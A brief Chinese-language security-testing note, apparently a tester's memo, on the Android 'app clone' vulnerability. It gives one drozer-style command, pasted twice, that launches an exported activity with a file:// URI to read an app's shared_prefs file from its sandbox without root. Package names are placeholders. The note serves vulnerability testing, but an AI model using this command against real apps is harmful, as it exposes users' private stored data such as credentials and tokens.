应用克隆漏洞测试
在不root的情况下,能获取沙盒的内容即存在问题,Demo如下
run .app.activity.start --component xxx.xxxx.xxxxxx xxx.xxx.xxx.MainActivity --action android.intent.action.VIEW --data-uri file:///data/data/xxx.xxx.xxxx/shared_prefs/xxx.xxx.xxxxxx_preferences.xml
在不root的情况下,能获取沙盒的内容即存在问题,Demo如下
run .app.activity.start --component xxx.xxxx.xxxxxx xxx.xxx.xxx.MainActivity --action android.intent.action.VIEW --data-uri file:///data/data/xxx.xxx.xxxx/shared_prefs/xxx.xxx.xxxxxx_preferences.xml